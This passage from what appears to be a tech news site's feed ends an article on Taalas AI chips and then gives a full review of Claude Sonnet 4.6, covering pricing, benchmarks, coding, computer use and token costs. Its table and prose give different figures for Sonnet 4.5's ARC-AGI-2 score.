workloads where speed and power matter more than flexibility, burning a model into a chip is cheaper than renting a GPU, and if the numbers hold, that is a market worth $169 million of someone else's money.</p> <p><strong>Sources:</strong></p> <ul> <li><a href="https://taalas.com/the-path-to-ubiquitous-ai/">The path to ubiquitous AI - Taalas</a></li> <li><a href="https://www.nextplatform.com/2026/02/19/taalas-etches-ai-models-onto-transistors-to-rocket-boost-inference/">Taalas Etches AI Models Onto Transistors To Rocket Boost Inference - The Next Platform</a></li> <li><a href="https://siliconangle.com/2026/02/19/taalas-raises-169m-funding-develop-model-specific-ai-chips/">Taalas raises $169M in funding to develop model-specific AI chips - SiliconANGLE</a></li> <li><a href="https://quiet.com/essays/ai-at-the-speed-of-silicon/">AI at the Speed of Silicon: Powering the Era of Intelligence Everywhere - Quiet Capital</a></li> <li><a href="https://news.ycombinator.com/item?id=47086181">Hacker News discussion</a></li> <li><a href="https://www.cxodigitalpulse.com/taalas-raises-169-million-to-build-custom-ai-chips-challenging-nvidia/">Taalas Raises $169 Million to Build Custom AI Chips Challenging Nvidia - CXO Digitalpulse</a></li> </ul>Daniel OkaforNewsClaude Sonnet 4.6 Review: The Workhorse That Ate the Flagshiphttps://awesomeagents.ai/reviews/review-claude-sonnet-4-6/Fri, 20 Feb 2026 16:07:29 +0100https://awesomeagents.ai/reviews/review-claude-sonnet-4-6/<p>Anthropic has a cannibalization problem, and it is entirely self-inflicted. Just twelve days after launching <a href="/reviews/review-claude-opus-4-6/">Claude Opus 4.6</a> - a model I scored 9.3/10 and called one of the most capable AI systems available - the company released Claude Sonnet 4.6, a mid-tier model that matches its flagship on nearly every metric that matters to working developers. The price? One-fifth of Opus. If you are building with Claude today, this is almost certainly the model you should be using.</p><p>Anthropic has a cannibalization problem, and it is entirely self-inflicted. Just twelve days after launching <a href="/reviews/review-claude-opus-4-6/">Claude Opus 4.6</a> - a model I scored 9.3/10 and called one of the most capable AI systems available - the company released Claude Sonnet 4.6, a mid-tier model that matches its flagship on nearly every metric that matters to working developers. The price? One-fifth of Opus. If you are building with Claude today, this is almost certainly the model you should be using.</p> <h2 id="what-sonnet-46-actually-is">What Sonnet 4.6 Actually Is</h2> <p>Sonnet 4.6 is the latest entry in Anthropic's mid-range tier, sitting below the premium Opus line and above the lightweight Haiku models. It launched on February 17, 2026, and is available across all Claude plans (including the free tier on claude.ai), Claude Code, the Anthropic API, and major cloud platforms including AWS Bedrock, Google Cloud Vertex AI, and Microsoft Azure Foundry.</p> <p>The pricing is unchanged from Sonnet 4.5: $3 per million input tokens and $15 per million output tokens. That is five times cheaper than Opus 4.6 ($15/$75) and roughly half the cost of OpenAI's GPT-5.3 Codex ($6/$30). With prompt caching, costs drop by up to 90%. With batch processing, another 50%.</p> <p>The headline feature is a <strong>1 million token context window</strong> (currently in beta), making it the first Sonnet-class model to handle full codebases, long contracts, or dozens of research papers in a single prompt. The default remains 200K tokens, with the extended window available via API flag.</p> <h2 id="the-benchmarks-tell-a-story">The Benchmarks Tell a Story</h2> <p>The numbers are the reason this review exists. Sonnet 4.6 does not just close the gap with Opus - it practically eliminates it on the benchmarks developers care about most.</p> <table> <thead> <tr> <th>Benchmark</th> <th>Sonnet 4.6</th> <th>Sonnet 4.5</th> <th>Opus 4.6</th> </tr> </thead> <tbody> <tr> <td>SWE-bench Verified</td> <td>79.6%</td> <td>70.3%</td> <td>83.8%</td> </tr> <tr> <td>OSWorld (computer use)</td> <td>72.5%</td> <td>42.0%</td> <td>72.7%</td> </tr> <tr> <td>ARC-AGI-2 (reasoning)</td> <td>58.3%</td> <td>24.4%</td> <td>~65%</td> </tr> <tr> <td>Math</td> <td>89%</td> <td>62%</td> <td>-</td> </tr> <tr> <td>Terminal-bench</td> <td>52.5%</td> <td>40.5%</td> <td>56.7%</td> </tr> <tr> <td>TAU-bench Airline</td> <td>62.0%</td> <td>57.6%</td> <td>67.8%</td> </tr> <tr> <td>TAU-bench Retail</td> <td>67.0%</td> <td>63.2%</td> <td>67.5%</td> </tr> <tr> <td>GDPval-AA (Elo)</td> <td>1633</td> <td>-</td> <td>1606</td> </tr> </tbody> </table> <p>The SWE-bench jump from 70.3% to 79.6% is a 13% relative improvement over Sonnet 4.5. But the standout is OSWorld, the benchmark that measures a model's ability to autonomously operate computer interfaces - clicking buttons, navigating applications, completing multi-step workflows. Sonnet 4.6 scored 72.5%, essentially tied with Opus 4.6 at 72.7%, and demolishing GPT-5.2's 38.2%. For context, when computer use first launched with Sonnet 3.5 in October 2024, the score was 14.9%. That is a fivefold improvement in sixteen months.</p> <p>The ARC-AGI-2 result deserves special attention. This abstract reasoning benchmark went from 13.6% (Sonnet 4.5) to 58.3% - a 4.3x improvement in a single generation. It is the largest single-generation gain Anthropic has published on any benchmark.</p> <p>On GDPval-AA, which measures real-world office and knowledge work tasks, Sonnet 4.6 actually <em>leads</em> Opus 4.6 with an Elo of 1633 versus 1606. This is the first time a Sonnet model has outscored its Opus counterpart on any major benchmark.</p> <h2 id="coding-where-it-matters-most">Coding: Where It Matters Most</h2> <p>For developers - and given this site's audience, that means most of you - the <a href="/leaderboards/coding-benchmarks-leaderboard/">coding benchmarks</a> are the real story. Sonnet 4.6 scores 79.6% on SWE-bench Verified, putting it within 4.2 points of Opus 4.6 and comfortably ahead of GPT-5.2 and Gemini 3 Pro.</p> <p>In Claude Code testing, developers preferred Sonnet 4.6 over Sonnet 4.5 <strong>70% of the time</strong> and over the previous flagship Opus 4.5 <strong>59% of the time</strong>. Early adopters report that the model reads context more effectively before modifying code, consolidates shared logic rather than duplicating it, and generates noticeably more polished frontend output with better layouts, animations, and design sensibility.</p> <p>The model particularly excels at complex code fixes that require searching across large codebases - exactly the kind of task where the 1M context window earns its keep. For developers using <a href="/tools/best-ai-coding-assistants-2026/">AI coding assistants</a> like Cursor, Windsurf, or Claude Code, the recommendation from multiple reviewers is the same: switch immediately. Sonnet 4.6 is faster, cheaper, and arguably smarter for practical development work than flagship models released just months ago.</p> <p>Where GPT-5.3 Codex still holds an edge is in terminal-based workflows (77.3% on Terminal-Bench 2.0 vs. Sonnet 4.6's 52.5%) and multi-language real-world tasks. Gemini 3.1 Pro dominates competitive and algorithmic coding, with a LiveCodeBench Elo of 2,887. But for the daily work of building and maintaining software, Sonnet 4.6 sits at or near the top - and at the lowest cost of any frontier-class model.</p> <h2 id="computer-use-the-quiet-revolution">Computer Use: The Quiet Revolution</h2> <p>While coding gets the headlines, Sonnet 4.6's computer use capabilities might be its most consequential feature. The 72.5% OSWorld score means the model can successfully operate computer interfaces - navigating legacy software, filling forms, completing multi-step workflows - with a reliability that starts to look useful rather than merely impressive.</p> <p>This matters because almost every organization runs legacy systems that were built before APIs existed: insurance portals, government databases, ERP systems, hospital scheduling tools. A model that can look at a screen and interact with it opens all of these to automation without building custom integrations. At $3 per million input tokens, that automation becomes cost-effective even for relatively mundane tasks.</p> <p>The 94% accuracy on the Pace insurance benchmark - a real-world test of computer use in an actual enterprise environment - suggests this is not just a benchmark game. There are production-grade applications waiting.</p> <p>That said, Anthropic is candid that the model &quot;still lags behind most skilled humans&quot; at computer use, and prompt injection remains a risk when the model interacts with web content. The improvements over Sonnet 4.5 in prompt injection resistance are significant, but mitigation strategies remain essential.</p> <h2 id="the-token-efficiency-problem">The Token Efficiency Problem</h2> <p>Every good review needs to dig into the weaknesses, and Sonnet 4.6 has a notable one: it is verbose.</p> <p>On the GDPval-AA benchmark, Sonnet 4.6 consumed 280 million tokens to achieve its leading Elo score. Sonnet 4.5 used 58 million on the same evaluation - a 4.8x difference. For tasks involving adaptive thinking or extended reasoning, Sonnet 4.6 can burn through up to four times more tokens than its predecessor.</p> <p>This creates a counterintuitive situation. Sonnet 4.6 costs $3/$15 per million tokens versus Opus 4.6's $15/$75. But if Sonnet uses 4.5x more tokens to complete the same task, the all-in cost can actually exceed Opus. In practice, this means engineers need to think about model routing - using Sonnet for the vast majority of tasks where it is both cheaper and sufficient, but switching to Opus for deep reasoning chains where token efficiency matters.</p> <p>The latent.space analysis captured this well: developers should treat Sonnet 4.6 as the default, with Opus 4.6 as a surgical tool for tasks requiring maximum reliability in 20+ step reasoning chains or deep scientific analysis (the GPQA Diamond gap remains wide at 74.1% vs. 91.3%).</p> <h2 id="new-capabilities-worth-noting">New Capabilities Worth Noting</h2> <p>Beyond raw performance, Sonnet 4.6 ships with several meaningful new features:</p> <ul> <li><strong>Adaptive thinking</strong>: The model dynamically adjusts reasoning depth based on task complexity, similar to Opus 4.6's implementation</li> <li><strong>Context compaction</strong> (beta): Automatically summarizes older conversation context as conversations approach limits, effectively extending usable context length</li> <li><strong>Improved instruction following</strong>: Early testers report noticeably better adherence to constraints and formatting requirements</li> <li><strong>Enhanced prompt injection resistance</strong>: Major improvements over Sonnet 4.5, though not yet at Opus 4.6 levels</li> <li><strong>Code execution and web search</strong>: Now generally available, with automatic code-based filtering of search results to keep context clean</li> </ul> <h2 id="strengths">Strengths</h2> <ul> <li>Near-Opus performance on coding (79.6% SWE-bench) and computer use (72.5% OSWorld) at one-fifth the price</li> <li>1M token context window opens full-codebase analysis at the mid-tier price point</li> <li>Best-in-class on GDPval-AA knowledge work tasks (Elo 1633)</li> <li>4.3x improvement on ARC-AGI-2 in a single generation</li> <li>Available on free tier, making frontier-class coding AI accessible to everyone</li> <li>Same $3/$15 pricing as Sonnet 4.5 - no premium for the massive upgrades</li> </ul> <h2 id="weaknesses">Weaknesses</h2> <ul> <li>Token consumption up to 4.8x higher than Sonnet 4.5 on complex reasoning tasks</li> <li>All-in cost can exceed Opus for some workloads despite lower per-token pricing</li> <li>GPQA Diamond score (74.1%) shows a significant gap with Opus (91.3%) on deep scientific reasoning</li> <li>Terminal-bench performance (52.5%) lags behind GPT-5.3 Codex (77.3%)</li> <li>Early post-launch reports of structured output errors and hallucinated function names (reportedly fixed)</li> <li>Extended context (200K+) carries premium pricing that erodes the cost advantage</li> </ul> <h2 id="verdict-9010">Verdict: 9.0/10</h2> <p>Claude Sonnet 4.6 is the most impressive mid-tier model release I have reviewed. It does not merely narrow the gap with flagship models - it closes it on the benchmarks that matter most to developers and enterprise users. The fact that it outscores Opus 4.6 on office task benchmarks while costing 80% less is, frankly, extraordinary.</p> <p>The token efficiency issue is real and worth monitoring, particularly for teams running complex agentic workloads at scale. And if your work demands peak scientific reasoning, Opus 4.6 remains the better choice. But for the overwhelming majority of use cases - coding, computer use, document analysis, knowledge work - Sonnet 4.6 delivers roughly 98% of Opus performance at a fraction of the cost.</p> <p>The strategic implication is clear: Anthropic is compressing the performance gap between its tiers faster than anyone expected. If you are choosing an LLM for a new project in 2026, Sonnet 4.6 should be your starting point, not Opus. That is both a compliment to this model and a challenge for Anthropic's own pricing strategy. When your mid-tier product is this good, how do you justify the premium?</p> <p>For an overview of how to navigate the current model landscape, see our <a href="/guides/how-to-choose-an-llm-2026/">guide to choosing an LLM in 2026</a>. And if cost-per-task matters to your deployment, check our <a href="/leaderboards/cost-efficiency-leaderboard/">cost efficiency leaderboard</a> for the latest comparisons.</p> <p><strong>Sources:</strong></p> <ul> <li><a href="https://www.anthropic.com/news/claude-sonnet-4-6">Introducing Claude Sonnet 4.6 - Anthropic</a></li> <li><a href="https://www.nxcode.io/resources/news/claude-sonnet-4-6-complete-guide-benchmarks-pricing-2026">Claude Sonnet 4.6: Complete Guide to Benchmarks, Features, and Pricing - NxCode</a></li> <li><a href="https://www.sitepoint.com/claude-sonnet-4-6-vs-gpt-5-the-2026-developer-benchmark/">Claude Sonnet 4.6 vs. GPT-5: The 2026 Developer Benchmark - SitePoint</a></li> <li><a href="https://venturebeat.com/technology/anthropics-sonnet-4-6-matches-flagship-ai-performance-at-one-fifth-the-cost">Anthropic's Sonnet 4.6 Matches Flagship AI Performance at One-Fifth the Cost - VentureBeat</a></li> <li><a href="https://www.latent.space/p/ainews-claude-sonnet-46-clean-upgrade">AINews: Claude Sonnet 4.6 Clean Upgrade - Latent Space</a></li> <li><a href="https://www.geeky-gadgets.com/anthropic-sonnet-4-6-token-costs/">High Token Usage in Claude Sonnet 4.6 Limits Value for Long Reasoning Tasks - Geeky Gadgets</a></li> <li><a href="https://www.zyte.com/blog/llm-benchmark-claude-sonnet-46/">Claude Sonnet 4.6 is the New Best Model for Writing Scrapers - Zyte</a></li> <li><a href="https://blog.getbind.co/gemini-3-1-pro-vs-claude-sonnet-4-6-vs-gpt-5-3-coding-comparison/">Gemini 3.1 Pro vs Claude Sonnet 4.6 vs GPT-5.3 Coding Comparison - Bind AI</a></li> <li><a href="https://www.cnbc.com/2026/02/17/anthropic-ai-claude-sonnet-4-6-default-free-pro.html">Anthropic Releases Claude Sonnet 4.6 - CNBC</a></li> <li><a href="https://www.digitalapplied.com/blog/claude-sonnet-4-6-benchmarks-pricing-guide">Claude Sonnet 4.6: Benchmarks, Pricing and Complete Guide - Digital Applied</a></li> </ul>Elena MarchettiReviews